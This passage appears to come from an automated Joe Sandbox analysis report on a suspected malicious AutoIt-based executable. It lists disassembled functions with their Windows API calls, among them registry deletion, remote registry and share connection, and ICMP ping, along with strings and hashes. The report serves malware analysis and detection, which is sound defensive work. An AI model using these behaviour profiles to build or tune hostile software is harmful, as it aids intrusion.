                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ECCCF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2734957052-4033151799
                                          • Opcode ID: 47313d79c2dce7d96feeb668c97ac6978b1055418bb5b8cca99fdbeff1f85811
                                          • Instruction ID: 142fb7362b4672e9a8a3cbdb9b361fa93c6b0d7837166fd4f75684416b5c66c0
                                          • Opcode Fuzzy Hash: 47313d79c2dce7d96feeb668c97ac6978b1055418bb5b8cca99fdbeff1f85811
                                          • Instruction Fuzzy Hash: 6D318671902129BFDB209B51DD88EFFBF7CEF15744F204169E90AF2140D7349A46DAA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • timeGetTime.WINMM ref: 00EAE6B4
                                            • Part of subcall function 00E5E551: timeGetTime.WINMM ref: 00E5E555
                                          • Sleep.KERNEL32(0000000A), ref: 00EAE6E1
                                          • EnumThreadWindows.USER32 ref: 00EAE705
                                          • FindWindowExW.USER32 ref: 00EAE727
                                          • SetActiveWindow.USER32 ref: 00EAE746
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EAE754
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EAE773
                                          • Sleep.KERNEL32(000000FA), ref: 00EAE77E
                                          • IsWindow.USER32 ref: 00EAE78A
                                          • EndDialog.USER32 ref: 00EAE79B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: d86733227b8e44673365a9e160c79fa6a5c5e50dbd384d7f03bb3930bcffefa0
                                          • Instruction ID: 24c0668b0b7fa3e24d34d3aed7421e884e76efb6cabdda9182de1c5ac10258fa
                                          • Opcode Fuzzy Hash: d86733227b8e44673365a9e160c79fa6a5c5e50dbd384d7f03bb3930bcffefa0
                                          • Instruction Fuzzy Hash: 9B21C670301209AFEB005F71FC89B653BA9F79A788F216426F511B62E1DB71BC14EA25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EAEA5D
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EAEA73
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EAEA84
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EAEA96
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EAEAA7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: SendString$_wcslen
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2420728520-1007645807
                                          • Opcode ID: aa097e1a97246b1e42a448f98b2e373570a60edde66379bb9de129c40cc77e9e
                                          • Instruction ID: 25010fb5920d0fcaa49ee53d916b4caf623c0e37ea5100faf51f384cdc67a17e
                                          • Opcode Fuzzy Hash: aa097e1a97246b1e42a448f98b2e373570a60edde66379bb9de129c40cc77e9e
                                          • Instruction Fuzzy Hash: BC11A331A902597DE720A7A1EC4AEFF6BBCEBD6B04F001429B411F60D1EE705914D5B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E42CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColorBrush.USER32 ref: 00E42D07
                                          • RegisterClassExW.USER32(00000030), ref: 00E42D31
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E42D42
                                          • InitCommonControlsEx.COMCTL32(?), ref: 00E42D5F
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E42D6F
                                          • LoadIconW.USER32 ref: 00E42D85
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E42D94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: e3eca67da570ad60c6a6598418e2ae9f57f3b6c9952d7a7486d496ab682d46b0
                                          • Instruction ID: 9e39ca80f39dd0b3fcf4dccf48b19d012682b3a6d84ee8955da06bb7fa249718
                                          • Opcode Fuzzy Hash: e3eca67da570ad60c6a6598418e2ae9f57f3b6c9952d7a7486d496ab682d46b0
                                          • Instruction Fuzzy Hash: C221B2B590221DAFDB00DFA5E849BDDBBB8FB08741F10811BE621B62A0D7B14544DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E58BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E58F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00E58FC5
                                          • DestroyWindow.USER32 ref: 00E58C81
                                          • KillTimer.USER32 ref: 00E58D1B
                                          • DestroyAcceleratorTable.USER32 ref: 00E96973
                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E58BBA,00000000,?), ref: 00E969A1
                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E58BBA,00000000,?), ref: 00E969B8
                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E58BBA,00000000), ref: 00E969D4
                                          • DeleteObject.GDI32(00000000), ref: 00E969E6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: 2ef4d4add92141dbb38d121a37643de85c4b709a1760aea4edbcea70831fff30
                                          • Instruction ID: bcb999d4409d5c7823d8e7242d8a5f359d4f96cbb37867e3edd021f8c2a65c13
                                          • Opcode Fuzzy Hash: 2ef4d4add92141dbb38d121a37643de85c4b709a1760aea4edbcea70831fff30
                                          • Instruction Fuzzy Hash: B661BD30102605DFDF219F25DA48BA9B7F1FB4036AF11A91EE542BA560CB71AC88DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E59838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59944: GetWindowLongW.USER32(?,000000EB), ref: 00E59952
                                          • GetSysColor.USER32 ref: 00E59862
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 20dd3a74a76edf4e24e551a7a2285e988b729d5ee1c6cffbe60c678edabb414b
                                          • Instruction ID: 95a5e341e01231a7c0c0d44c2401a66ab57d146b92bc0b00bbafa5b56988d5d6
                                          • Opcode Fuzzy Hash: 20dd3a74a76edf4e24e551a7a2285e988b729d5ee1c6cffbe60c678edabb414b
                                          • Instruction Fuzzy Hash: 1B41B131105610DFDF245F39AC84BF93BA5EB06376F245A06FAA2AB1E2C7309C49DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32 ref: 00EA9717
                                          • LoadStringW.USER32(00000000,?,00E8F7F8,00000001), ref: 00EA9720
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • GetModuleHandleW.KERNEL32 ref: 00EA9742
                                          • LoadStringW.USER32(00000000,?,00E8F7F8,00000001), ref: 00EA9745
                                          • MessageBoxW.USER32 ref: 00EA9866
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wcslen
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 747408836-2268648507
                                          • Opcode ID: 17db5233b94d35bf7f801d70fae7e851b2159bdddc8632d7e5605ef02f497b40
                                          • Instruction ID: 9d7710d0b9c4e36a0b0cdfe798123ed66401c4f342068e0054a7cc9f7d834afb
                                          • Opcode Fuzzy Hash: 17db5233b94d35bf7f801d70fae7e851b2159bdddc8632d7e5605ef02f497b40
                                          • Instruction Fuzzy Hash: 98413E72900219AADF04EFE0ED86DEEB7B8AF59340F601065F60576092EB356F48DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00EA07A2
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00EA07BE
                                          • RegOpenKeyExW.ADVAPI32 ref: 00EA07DA
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00EA0804
                                          • CLSIDFromString.OLE32(?,000001FE), ref: 00EA082C
                                          • RegCloseKey.ADVAPI32(?), ref: 00EA0837
                                          • RegCloseKey.ADVAPI32(?), ref: 00EA083C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 323675364-22481851
                                          • Opcode ID: 1fbdc5a30241af7cdc291507b4a278bedba895f3ec3e06162eab853bb19ad72f
                                          • Instruction ID: 756f7f10579faed60af4d3b4397abe69d804afd61b8f6567174477b81f365f65
                                          • Opcode Fuzzy Hash: 1fbdc5a30241af7cdc291507b4a278bedba895f3ec3e06162eab853bb19ad72f
                                          • Instruction Fuzzy Hash: C2411A72C00129AFDF15EBA4EC858EEB7B8FF48754B145125E901B71A1DB30AD04CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00ED5504
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00ED5515
                                          • CharNextW.USER32(00000158), ref: 00ED5544
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00ED5585
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00ED559B
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00ED55AC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$CharNext
                                          • String ID:
                                          • API String ID: 1350042424-0
                                          • Opcode ID: 928830bf6e96702ab88693edbb37c7fe01a9bfa06dff8f4634e7d946613f39a6
                                          • Instruction ID: b36c146dc1d689201712b305ea480b974bdf0ce6650046c1cc994af990970506
                                          • Opcode Fuzzy Hash: 928830bf6e96702ab88693edbb37c7fe01a9bfa06dff8f4634e7d946613f39a6
                                          • Instruction Fuzzy Hash: 39618D32901609EFDB108F55DC849FE7BB9EB05764F10514BF935BA390D7708A82DB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00EC05BC
                                          • inet_addr.WSOCK32(?), ref: 00EC061C
                                          • gethostbyname.WSOCK32(?), ref: 00EC0628
                                          • IcmpCreateFile.IPHLPAPI ref: 00EC0636
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EC06C6
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EC06E5
                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00EC07B9
                                          • WSACleanup.WSOCK32 ref: 00EC07BF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 2501be166c4958f64cbc12494b6fafc744b424405d8c91d479787ceb8add7225
                                          • Instruction ID: a934fd4e5c16a680a1b7de5626ec4c7349ba41d9153cb0317ba1b4f5e9cdfe7b
                                          • Opcode Fuzzy Hash: 2501be166c4958f64cbc12494b6fafc744b424405d8c91d479787ceb8add7225
                                          • Instruction Fuzzy Hash: 5591AC34608201DFD724DF15D689F1ABBE0EF48318F1495AEE469AB6A2C731ED46CF81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharLower
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 707087890-567219261
                                          • Opcode ID: 6e74fbf46b8306b90543d4e65272cda32b53a6383d5edb8cc7404a0c7a1fa702
                                          • Instruction ID: 3339b709c0a213b7b03b38cf2a9e9dc7cb5fb9e6c833d71dea169b2d9cb2cc65
                                          • Opcode Fuzzy Hash: 6e74fbf46b8306b90543d4e65272cda32b53a6383d5edb8cc7404a0c7a1fa702
                                          • Instruction Fuzzy Hash: FC518D31A001169ACB14DF68CB50ABEB7E5AF64328B20522DE426F72C5DB32ED42C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EC372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 636576611-1287834457
                                          • Opcode ID: bdb725454fe020780ea25b7111cae830fc245dc0250e74ec6e96070d4f60c429
                                          • Instruction ID: e9d7b0446c6a16912fa1cb3767fc1d4af5852fa2e44968ab67c3ff090f670d5d
                                          • Opcode Fuzzy Hash: bdb725454fe020780ea25b7111cae830fc245dc0250e74ec6e96070d4f60c429
                                          • Instruction Fuzzy Hash: 7261BD71608301AFD314DF64D988F9ABBE4EF49714F10980EF985AB291C771EE49CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocalTime.KERNEL32 ref: 00EB8257
                                          • SystemTimeToFileTime.KERNEL32 ref: 00EB8267
                                          • LocalFileTimeToFileTime.KERNEL32 ref: 00EB8273
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EB8310
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB8324
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB8356
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB838C
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00EB8395
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryTime$File$Local$System
                                          • String ID: *.*
                                          • API String ID: 1464919966-438819550
                                          • Opcode ID: c753f7f1a1c615a18d02a1b5ada9234e975bb21eeedf9f1e7406e780320d50e2
                                          • Instruction ID: f7ed375c8c6cad6828da5ca2b102b2d51f1c4282a4b2064a14955e08dc69fd39
                                          • Opcode Fuzzy Hash: c753f7f1a1c615a18d02a1b5ada9234e975bb21eeedf9f1e7406e780320d50e2
                                          • Instruction Fuzzy Hash: EB616A725043059FC710EF64D84099FB3EDFF89314F04591AF989A7251EB35E909CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00EB33CF
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00EB33F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LoadString$_wcslen
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 4099089115-3080491070
                                          • Opcode ID: 3c08b6af42e307bab3e9dbb9d0e5cc08b6d7bd5a9952ba0d063397227a261e9f
                                          • Instruction ID: d7190169f1d8b9aa70a09650f4b59cfb2f1075d947c484973b5de2579d271f8a
                                          • Opcode Fuzzy Hash: 3c08b6af42e307bab3e9dbb9d0e5cc08b6d7bd5a9952ba0d063397227a261e9f
                                          • Instruction Fuzzy Hash: B151A272D00209AADF15EBE0ED46EEEB3B9EF08340F205165F51572092EB356F58EB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 1256254125-769500911
